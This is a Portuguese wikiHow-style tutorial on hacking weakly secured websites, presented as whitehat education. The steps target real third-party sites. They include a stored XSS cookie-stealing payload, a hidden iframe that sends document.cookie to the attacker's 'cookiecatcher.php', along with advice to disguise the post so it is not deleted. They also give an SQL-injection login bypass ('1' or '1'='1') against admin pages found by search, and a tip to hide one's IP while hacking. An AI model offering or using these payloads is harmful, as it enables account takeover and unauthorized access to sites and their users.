Baixe em PDFBaixe em PDFX
O How.com.vn é uma "wiki"; ou seja, muitos de nossos artigos são escritos em parceria com várias pessoas. Para criar este artigo, 28 pessoas, algumas anônimas, editaram e melhoraram o texto desde sua criação.
Este artigo foi visualizado 102 499 vezes.
Atenção: este guia deve ser usado apenas para fins educacionais, seja para ajudar as pessoas a começar a aprender “hacks whitehat”[1] ou para ver como hackers trabalham a fim de melhor proteger seus próprios sites. Este tutorial dará os passos para ter acesso a diversos sites de BAIXO NÍVEL de segurança.
Passos
Encontre um site vulnerável onde você possa postar conteúdo. Um fórum é um bom exemplo. Lembre-se, se o site for seguro, este método não vai funcionar[2].
Crie um post. Você terá que digitar um código especial para o "post" que vai capturar os dados de todos os que clicarem sobre ele.- Você vai querer testar para ver se o sistema permite a publicação de códigos ou se os filtra. Digite <script...>alert(“teste”)</...script> (removendo o "..."). Se uma caixa de alerta aparecer quando você clica no seu post, o site está vulnerável a ataques.
Crie e envie o seu “cookie catcher”[3]. O objetivo deste ataque é capturar os cookies de um usuário, que permite que você acesse sua conta neste site com vulnerabilidade no login. Você vai precisar de um “cookie catcher”, que irá capturar os cookies do seu alvo e redirecioná-lo. Faça o upload do “cookie catcher” em um site que tenha acesso e tenha suporte para PHP. Procurer por exemplos de “cookie catcher” na internet.
Faça um post com o script de seu “cookie catcher”. Introduza um código adequado que irá capturar os cookies e enviá-los para o seu site. Você deve colocar algum texto após o código para disfarçar seu post e evitar que seja deletado.- Um código de exemplo ficaria assim <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>(removendo os "...").
Use os cookies coletados. Depois disso, você pode usar as informações dos cookies, que devem estar armazenados em seu site, para quaisquer fins que você precisar.Publicidade
Encontre um site vulnerável. Você terá que encontrar um site vulnerável, que tenha um login de administrador de fácil acesso. Pesquise no Google por “admin login.asp”.
Faça o login como administrador. Digite admin como o nome de usuário e use alguns códigos conhecidos como a senha. Os mais comuns são 1' ou '1 '= '1.
Paciência. Este método exige um pouco de tentativa e erro.
Acesse o site. Eventualmente, encontrará a sequência que permite acesso de administrador para o site (se ele for um site vulnerável a ataques).Publicidade
Aprenda uma ou duas linguagens de programação. Se realmente quiser aprender a hackear sites, você precisa entender como os computadores e outras tecnologias funcionam. Aprenda a usar linguagens de programação como Python ou SQL, de modo que possa controlar melhor computadores e identificar vulnerabilidades em sistemas.
Conheça a programação HTML. Você também precisa ter um bom conhecimento de HTML e javascript para hackear sites. Isso leva algum tempo para aprender, mas há inúmeras formas gratuitas de aprender HTML gratuitamente na internet.
Busque “whitehats”. “Whitehats” são hacks usados para o bem, expondo as vulnerabilidades de segurança e tornam a Internet um lugar melhor para todos. Se quiser aprender a hackear, procure sempre usar seus conhecimentos para identificar brechas em sites para repassá-las às pessoas responsáveis para que possam consertar esses erros. Converse com hackers whitehats para aprender mais sobre essa linha de trabalho.
Pesquise intensamente. Se estiver aprendendo a hackear ou apenas se proteger, você precisará fazer muita pesquisa. Há muitas formas diferentes de vulnerabilidades e essa lista está sempre mudando, então você terá que se atualizar constantemente.
Mantenha-se atualizado. Como a lista de hacks possíveis está em mudança constante, você precisa se manter atualizado constantemente. Só porque você está protegido para um determinado hack hoje, não significa que você estará seguro no futuro!Publicidade
Dicas
- Visite os fóruns de hackers para aprender inúmeras dicas úteis.
Publicidade
Avisos
- Hackear é ilegal. Se você for pego, a culpa é sua.
- Se você estiver tentando hackear no mundo real, esconda seu endereço IP usando um sofware que criptografe sua conexão.
- Se você ler este artigo, não se tornará imediatamente um hacker. Você deve explorar suas habilidades e praticar muito.
Publicidade
Referências
Este artigo foi útil?
⚠️ Disclaimer:
Content from Wiki How Português language website. Text is available under the Creative Commons Attribution-Share Alike License; additional terms may apply.
Wiki How does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein.
- - A few of these subjects are frequently censored by educational, governmental, corporate, parental and other filtering schemes.
- - Some articles may contain names, images, artworks or descriptions of events that some cultures restrict access to
- - Please note: Wiki How does not give you opinion about the law, or advice about medical. If you need specific advice (for example, medical, legal, financial or risk management), please seek a professional who is licensed or knowledgeable in that area.
- - Readers should not judge the importance of topics based on their coverage on Wiki How, nor think a topic is important just because it is the subject of a Wiki article.
Publicidade
